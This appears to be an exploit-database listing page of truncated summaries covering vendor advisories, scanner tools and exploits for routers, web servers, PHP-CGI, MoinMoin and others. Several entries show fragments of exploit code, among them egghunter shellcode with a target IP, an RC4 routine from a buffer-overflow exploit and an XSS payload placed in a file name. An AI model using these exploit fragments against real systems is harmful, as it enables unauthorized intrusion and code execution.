Cisco released Security advisory for critical Router password reset vulnerability

In the first week of this year, we have reported about a critical vulnerability found in more than 2000 Routers that allow attackers to reset the admin panel password to defaults. Recently, Cisco has released a security advisory, detailed about the similar vulnerability affecting their three...

XSS when attaching a file to an issue

Hi, I found a persistent XSS vulnerability when attaching a file to an issue. The steps to reproduce are the following : - Attach a file to an issue. Its name must contain "alert'XSS'". I used a python script to do that. - Browse to the issue and open the ALL tab under activity. A popup should...

TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service

Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...

[Firefox] убираем кодирование кавычек в URL | Firefox URL quote encoding patch

See next post for English description! Патч призван устранить кодирование кавычек ',", в HTTP запросах. Начиная с версии 3.0 коммит, Firefox стал урл-кодировать одинарную кавычку ' в %27. Данное поведение нередко может помешать обнаружить SQL инъекцию в веб-приложениях, например, при участии...

SEC Consult SA-20131003-0 :: Denial of service vulnerability in Citrix NetScaler

SEC Consult Vulnerability Lab Security Advisory 20131003-0 ======================================================================= title: nsconfigd NSRPCREMOTECMD Denial of service vulnerability product: Citrix NetScaler vulnerable version: NetScaler 10.0 Build 76.7 fixed version: NetScaler 10.0...

Fedora 18 : livecd-tools-18.17-1.fc18 (2013-13131)

Added a couple features to livecd-iso-to-disk --updates and --ks and fixed a traceback when there are dependency problems running livecd-creator. Require rsync The livecd-tools package provides support for reading and executing Kickstart files in order to create a system image. It was discovered...

AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities

Multiple vulnerabilities have been found in AVTECH AVN801 DVR and potentially other devices sharing the affected firmware that could allow a remote attacker to exploit multiple buffer overflows resulting in arbitrary code execution or bypass CAPTCHA functionality for logging into the administrati...

Bifrost 1.2.1 - Remote Buffer Overflow

Bifrost 1.2.1 - Remote Buffer Overflow !/usr/bin/python2.7 By : Mohamed Clay import socket from time import sleep from itertools import izip, cycle import base64 import sys def rc4cryptdata, key: x = 0 box = range256 for i in range256: x = x + boxi + ordkeyi % lenkey % 256 boxi, boxx = boxx, boxi...

Xpient Cash Drawer Operation Vulnerability

Advisory ID Internal CORE-2013-0517 1. Advisory Information Title: Xpient Cash Drawer Operation Vulnerability Advisory ID: CORE-2013-0517 Advisory URL:http://www.coresecurity.com/advisories/xpient-cash-drawer-operation-vulnerability Date published: 2013-06-05 Date of last update: 2013-06-05...

Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

MoinMelt Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

Vivotek IP Camera Buffer Overflow / Injection Vulnerabilities

Core Security Technologies Advisory - Vivotek IP Cameras suffer from information leak, buffer overflow, authentication, path traversal, and command injection vulnerabilities. Vulnerable are Vivotek PT7135 IP camera with firmware 0300a, Vivotek PT7135 IP camera with firmware 0400a, and possibly...

BigAnt Server 2.97 - DDNF 'Username' Remote Buffer Overflow

!/usr/bin/python Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman @cd1zz http://pwnag3.com Tested on: Windows 7 64 bit DEP/ASLR Bypass Similar Exploits: http://www.exploit-db.com/exploits/24528/ http://www.exploit-db.com/exploits/24527/...

[Http-enum] Automated HTTP Enumeration Tool

Null Security Team writing a python script for Automated HTTP Enumeration. currently only in the initial beta stage, but includes basic checking of files including the Apache server-status as well as well IIS WebDAV and Microsoft FrontPage Extensions, many more features will be added to this tool...

SAP NetWeaver Message Server - Multiple Vulnerabilities

SAP NetWeaver Message Server - Multiple Vulnerabilities 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date...

[Knock] Subdomain Scanner

Knock is a python script, written by Gianni 'guelfoweb' Amato , designed to enumerate subdomains on a target domain through a wordlist. For more information I have posted a documentation page. If you want to see how it works, you can see this sample output: Simple Scan Zone Transfer Scan Wildcard...

PHP-CGI Argument Injection Remote Code Execution

!/usr/bin/python import requests import sys print """ CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution This exploit abuses an arguement injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user. Feel free to give me abuse about this " sys.exit0 target =...

Broadcom DoS on BCM4325 and BCM4329 Devices

Exploit for hardware platform in category dos / poc Exploit Author: CoreLabs Core Security Technologies fue descubierta por el investigador argentino Andrés Blanco, Vendor Homepage: Software Link: download link if available Version: 1.0 Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HT...